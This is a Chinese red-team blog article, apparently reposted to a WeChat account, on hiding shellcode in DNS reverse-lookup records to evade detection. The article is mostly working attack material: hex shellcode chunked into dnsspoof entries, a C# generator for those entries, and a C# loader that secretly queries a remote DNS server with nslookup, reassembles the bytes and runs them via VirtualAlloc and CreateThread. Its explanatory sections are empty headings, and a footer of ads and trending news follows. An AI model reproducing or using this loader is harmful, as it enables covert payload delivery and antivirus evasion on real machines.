利用DNS 反向解析执行shellcode
作者简介 /Profile/
罗逸,平安科技银河实验室资深安全研究员,从业7年,专注红蓝对抗研究,擅长免杀技术、目标控制、内网渗透等。
0x01 什么是DNS反向解析
0x02 利用思路
2.1 工具dnsspoof
2.2 思路
2.3 优点
2.4 缺点
0x03 C#实现DNS反向解析传输数据
3.1 DnsHostCreate
3.2 启动dns服务
3.3 C# DNS text Loader
0x04 运行结果
0x05 结论
0x01 什么是DNS反向解析
0x02 利用思路
2.1 工具dnsspoof
192.168.1.0 "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"
启动DNS欺骗
dnsspoof -f dns.txt
λ nslookup 192.168.1.0 10.0.0.8
DNS request timed out.
timeout was 2 seconds.
服务器: UnKnown
Address: 10.0.0.8
名称: "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"
Address: 192.168.1.0
2.2 思路
2.3 优点
2.4 缺点
0x03 C#实现DNS反向解析传输数据
3.1 DnsHostCreate
string domain = args[0];
string ipsegment = args[1];
string payload = args[2];
string str = payload.Replace("0x","").Replace(", ","").Replace(" ","");
int dns_data_lenght = str.Length / 60;
if(str.Length % 60 !=0 )
{
dns_data_lenght += 1;
}
for (int i = 0; i < dns_data_lenght; i++)
{
string dns = "";
if (i == dns_data_lenght - 1)
{
dns = str.Substring((dns_data_lenght - 1) * 60);
}
else
{
dns = str.Substring(i * 60, 60);
}
Console.WriteLine(string.Format("{0}.{1} \"{2}.{3}\"", ipsegment, i.ToString(),dns,domain));
}
192.168.1.0 "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"
192.168.1.1 "8b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d41.google.com"
192.168.1.2 "01c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000.google.com"
...
192.168.1.29 "9689e2ffd54883c42085c074b6668b074801c385c075d758585848050000.google.com"
192.168.1.30 "000050c3e87ffdffff31302e302e302e380000000000.google.com"
[!] IPaddress Counter is: 31
[!] IP Segment: 192.168.1.
3.2 启动DNS服务
apt-get install dnsspoof -y
dnsspoof -f dns.txt
λ nslookup 192.168.1.0 10.0.0.8
DNS request timed out.
timeout was 2 seconds.
服务器: UnKnown
Address: 10.0.0.8
名称: "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"
Address: 192.168.1.0
3.3 C# DNS text Loader
string _DnsServer = "10.0.0.8";
string _IPaddress_Begin = "192.168.1.";
int _IPaddress_Counter = 31;
ProcessStartInfo ns_Prcs_info = new ProcessStartInfo("nslookup.exe", DNS_PTR_A + " " + DnsServer);
ns_Prcs_info.RedirectStandardInput = true;
ns_Prcs_info.RedirectStandardOutput = true;
ns_Prcs_info.UseShellExecute = false;
var random = new Random();
System.Threading.Thread.Sleep(random.Next(1, 800));
Process nslookup = new Process();
nslookup.StartInfo = ns_Prcs_info;
nslookup.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
nslookup.Start();
string computerList = nslookup.StandardOutput.ReadToEnd();
DNS request timed out.
timeout was 2 seconds.
服务器: UnKnown
Address: 10.0.0.8
名称: "fc4883e4f0e8c8000000415141505251564831d265488b5260488b521848.google.com"
Address: 192.168.1.0
string[] lines = computerList.Split('\r', 'n');
string last_line = lines[lines.Length - 4];
string temp_1 = last_line.Remove(0, 9);
_Records = "\"" + temp_1;
int i = temp_1.LastIndexOf('.');
string temp_2 = temp_1.Remove(i, (temp_1.Length - i));
int b = temp_2.LastIndexOf('.');
string final = temp_2.Remove(b, temp_2.Length - b);
for (int i = 0; i < _IPaddress_Counter; i++)
{
_DATA[i] = __nslookup(_IPaddress_Begin + i, _DnsServer);
DATA += _DATA[i].ToString();
}
object tmp = new object();
byte[] __Bytes = new byte[DATA.Length / 2];
for (int i = 0; i < __Bytes.Length - 1; i++)
{
int start = i * 2;
tmp = DATA.Substring(start, 2);
byte current = Convert.ToByte("0x" + tmp.ToString(), 16);
__Bytes[i] = current;
}
调用创建线程来运行payload
UInt32 funcAddr = VirtualAlloc(0, (UInt32)__Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(__Bytes, 0, (IntPtr)(funcAddr), __Bytes.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
0x04 运行结果
0x05 结论
银河实验室
往期回顾
技术
技术
技术
技术
长按识别二维码关注我们
微信号:PSRC_Team
球分享
球点赞
球在看
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/
关注网络尖刀微信公众号
随时掌握互联网精彩
随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 准确把握守正创新的辩证关系 7911269
- 2 中国黄金原董事长家搜出大量黄金 7930217
- 3 空调英文不会男生盯着考场空调看 7857848
- 4 消费品以旧换新“加速度” 7777434
- 5 被铁路售票员的手速惊到了 7632234
- 6 网红赤木刚宪爆改赵露思 7557671
- 7 县委原书记大搞“刷白墙”被通报 7431409
- 8 山姆代购在厕所分装蛋糕 7369754
- 9 马龙刘诗雯穿正装打混双 7203977
- 10 刘强东提前发年终奖 7145345